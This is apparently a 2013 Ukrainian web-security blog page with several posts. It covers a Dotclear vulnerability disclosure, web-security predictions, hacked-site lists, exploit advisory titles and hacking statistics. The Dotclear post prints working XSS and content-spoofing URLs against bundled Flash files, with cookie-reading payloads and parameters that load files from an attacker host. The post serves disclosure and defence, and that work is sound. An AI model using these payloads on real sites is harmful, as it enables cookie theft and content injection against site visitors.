Websecurity - Веб безпека

10.01.2013

У листопаді, 13.11.2012, я виявив Cross-Site Scripting та Content Spoofing уразливості в Dotclear. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливість в Dotclear.

Детальна інформація про уразливості з’явиться пізніше.

12.04.2013

Cross-Site Scripting (WASC-08):

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E
http://site/inc/swf/player_flv.swf?onclick=javascript:alert(document.cookie)
http://site/inc/swf/player_flv.swf?configxml=http://site/attacker.xml
http://site/inc/swf/player_flv.swf?config=http://site/attacker.txt

Код виконається після кліку. Це strictly social XSS.

Content Spoofing (WASC-12):

http://site/inc/swf/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

Можна включати текст, зображення та html (наприклад, для link injection).

http://site/inc/swf/player_flv.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_flv.swf?config=http://attacker/1.txt
http://site/inc/swf/player_flv.swf?flv=http://attacker/1.flv
http://site/inc/swf/player_mp3.swf?configxml=http://attacker/1.xml
http://site/inc/swf/player_mp3.swf?config=http://attacker/1.txt
http://site/inc/swf/player_mp3.swf?mp3=http://attacker/1.mp3

Уразливі Dotclear 2.4.4 (і частково 2.5) та попередні версії. В версії Dotclear 2.5 розробники виправили уразливості, але неефективно: по-перше, всі три вразливі флешки наявні в движку (тому з репозиторію чи з сайтів не слід їх брати для використання в своїх проектах, бо це вразливі версії флешек), по-друге, заборона прямого доступу до флешек (через .htaccess), щоб не можна було використати уразливості в них, працює лише на Apache, але не на інших веб серверах (тому сайти на них є вразливими).

Як і в попередні роки, надам свої прогнози розвитку веб безпеки в новому році. Але спочатку зроблю огляд тих прогнозів, що я давав на 2012 рік.

На початку минулого року я зробив свої прогнози стосовно розвитку галузі веб безпеки в минулому році. І зараз я оціню наскільки справдилися мої попередні прогнози.

1. Уразливості XSS в минулому році, як і раніше, все більше поширювалися (вони були найпоширенішими уразливостями веб додатків). Зокрема я оприлюднив уразливості у флешках, що розміщувалися на мільйонах сайтів.
2. Збільшилася кількість атак на державні сайти України - зростання взломів gov.ua-сайтів в 1,6 рази.
3. Активно знаходилися та використовувалися уразливості в браузерах (а також в плагінах, таких як Flash, Shockwave та Java) для атак на користувачів.
4. Збільшилася кількість DDoS-атак в Уанеті, в тому числі на державні сайти - зростання у 1,43 рази.
5. Значно зросла кількість заражених вірусами веб сторінок в Інтернеті. Зокрема в Уанеті в 2011 я виявив 233 інфікованих сайтів, а в 2012 вже 202 сайти (зменшення динаміки у 1,15 рази, але це я менше шукав інфіковані сайти, а насправді їх кількість зросла).
6. Збільшилися атаки на соціальні мережі, в тому числі на Twitter та були взломані LinkedIn та інші відомі сайти.
7. В Уанеті хакерська активність дещо впала порівняно з 2011 роком, зокрема в Уанеті спад на 19,5% (але то я менше досліджував, а насправді вона зросла).

Як видно всі мої попередні прогнози переважно збулися .

А тепер мій прогноз розвитку галузі веб безпеки в 2013 році.

1. Уразливостей у веб додатках буде знайдено набагато більше, ніж у інших додатках.
2. Збільшиться кількість атак на державні сайти України.
3. Зростання кількості заражених вірусами веб сторінок буде більш активним.
4. Все більше будуть використовуватися уразливості в браузерах та плагінах для атак на користувачів.
5. Втрати від кібершахрайства в Україні збільшаться.
6. Атаки на соціальні мережі та їхніх користувачів продовжать збільшуватися.
7. Продовжиться подальше зростання хакерської активності.

Продовжуючи розпочату традицію, після попереднього відео про ботнети: захоплення та керування, пропоную нове відео на веб секюріті тематику. Цього разу відео про захоплення мережі через руткіти для роутерів. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 20: Owning the Network: Adventures in Router Rootkits

Торік на конференції DEFCON 20 відбувся виступ Michael Coppola. В своєму виступі він розповів про атаки на роутері, про створення руткітів для них та встановлення їх в роутери для контролю над пристроями. Що може використовуватися для створення ботнетів з мережевих пристроїв - про такі випадки я писав неодноразово.

Майкл розповів про різні аспекти теми руткітів для роутерів. Рекомендую подивитися дане відео для розуміння сучасних загроз в Інтернеті.

У березні, 26.03.2013, майже через півтора місяці після виходу Google Chrome 25, вийшов Google Chrome 26.

В браузері зроблено декілька нововведень та виправлені помилки. А також виправлено 11 уразливостей, з яких 2 позначені як небезпечні. Це менше ніж у попередній версії браузера.

Уразливості, що мають статус небезпечних, пов’язані зі звертанням до вже звільненої області пам’яті при роботі Web Audio і проблемами з обробкою ізольованих сайтів в окремому процесі.

• Увидел свет web-браузер Chrome 26 (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.disgu.gov.ua (хакером Hmei7) - 29.01.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://che.gov.ua (хакером ZiqoR) - 03.02.2013 - похаканий державний сайт, зараз сайт взломаний Dr.SHA6H. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті
• http://www.transavio.com.ua (хакером misafir) - 13.01.2013, зараз сайт вже виправлений адмінами
• http://www.blagfond-ch.com.ua (хакером Sejeal) - 21.01.2013, зараз сайт вже виправлений адмінами
• http://cafeneptun.com (хакерами з 3xp1r3 Cyber Army) - 09.04.2013, зараз сайт вже виправлений адмінами

Виявлені численні уразливості безпеки в PostgreSQL.

Уразливі версії: PostgreSQL 8.4, PostgreSQL 9.1, PostgreSQL 9.2.

DoS, слабкий PRNG, підвищення привілеїв.

• PostgreSQL vulnerabilities (деталі)

В даній добірці експлоіти в веб додатках:

• Linksys WRT54GL apply.cgi Command Execution (деталі)
• BigAnt Server 2.97 - DDNF Username Buffer Overflow (деталі)
• Adobe ColdFusion APSB13-03 Remote Exploit (деталі)
• TP-Link TD-8817 CSRF Vulnerability (деталі)
• Pure-FTPd v1.0.21 Crash PoC (Null Pointer Dereference) (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Occasions, Count Per Day та IndiaNIC FAQS Manager. Для котрих з’явилися експлоіти. Occasions - це плагін для зміни логотипів по датам, Count Per Day - це плагін для ведення статистики відвідувань, IndiaNIC FAQS Manager - це плагін для управління списками часто задаваємих питань.

• WordPress Occasions 1.0.4 Cross Site Request Forgery (деталі)
• WordPress Count Per Day 3.2.5 XSS (деталі)
• WordPress IndiaNIC FAQS Manager 1.0 SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В своєму звіті Хакерська активність в Уанеті в 1 півріччі 2012 я навів дані про діяльність хакерів в Уанеті за період з 01.01.2012 по 30.06.2012, а в звіті Хакерська активність в Уанеті в 2 півріччі 2012 - дані за період з 01.07.2012 по 31.12.2012.

За весь 2012 рік в Уанеті було проведено 1142 атаки на веб сайти - 668 за перше півріччя і 474 за друге. Для порівняння, за весь 2011 рік було зафіксовано всього 1419 атак на веб сайти. І це тільки виявлені мною випадки, реальна кількість інцидентів може бути значно вищою.

Динаміка зростання хакерської активності за минулий рік: за перше півріччя 2012 активність менша на 14,6% в порівнянні з аналогічним періодом 2011 року, а за друге півріччя 2012 - на 25,6% менше за аналогічний період 2011 року. А в цілому в 2012 році активність впала на 19,5% порівняно з 2011 роком - спад в 1,24 рази.

В 2012 році загалом було атаковано 1142 веб ресурси (як взломи, так і DDoS атаки), перелік яких ви можете знайти у відповідних звітах за перше і друге півріччя минулого року. А також були інфіковані 203 сайти, які вірогідно були похакані в 2012 році. При цьому сайт nbuv.gov.ua був інфікований в першому і в другому півріччі, тому за рік інфіковано 202 окремих сайти.

Головні тенденції 2012 року в діяльності хакерів в Уанеті:

• Хакерська активність дещо впала - на 19,5% порівняно з 2011 роком (зменшення динаміки у 1,24 рази).
• Багато сайтів в Уанеті заражуються вірусами: в 2011 я виявив 233 інфікованих сайтів, в 2012 - вже 202 сайтів (зменшення динаміки у 1,15 рази).
• Кількість DDoS атак на сайти більша ніж в 2011 році - 40 випадків DDoS атак за рік (зростання у 1,43 рази). Це 3,5% від всіх атак за 2012 рік.
• Атаковано 171 державних сайтів та інфіковано ще 16 gov.ua-сайтів.
• Зростання взломів державних сайтів в 1,6 рази та збільшення інфікування gov.ua-сайтів в 1,78 рази порівняно з 2011 роком.

Велика кількість заражених сайтів в Уанеті (в тому числі gov.ua-сайтів) свідчить про чималий відсоток кримінальних взломів сайтів.

Підсумовуючи скажу, що активність хакерів в минулому році була високою і вона продовжить такою бути. І в 2013 році ця тенденція збережеться.

В новому році очікуйте на нові звіти про хакерську активність в Уанеті.

Численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 19.0, Firefox ESR 17.0, Thunderbird 17.0, SeaMonkey 2.16.

Численні пошкодження пам’яті, підвищення привілеїв, слабкі дозволи на файли, DoS, обхід захисту, міжсайтовий скриптінг.

• Mozilla Foundation Security Advisory 2013-30 (деталі)
• Mozilla Foundation Security Advisory 2013-31 (деталі)
• Mozilla Foundation Security Advisory 2013-32 (деталі)
• Mozilla Foundation Security Advisory 2013-33 (деталі)
• Mozilla Foundation Security Advisory 2013-34 (деталі)
• Mozilla Foundation Security Advisory 2013-35 (деталі)
• Mozilla Foundation Security Advisory 2013-36 (деталі)
• Mozilla Foundation Security Advisory 2013-37 (деталі)
• Mozilla Foundation Security Advisory 2013-38 (деталі)
• Mozilla Foundation Security Advisory 2013-39 (деталі)
• Mozilla Foundation Security Advisory 2013-40 (деталі)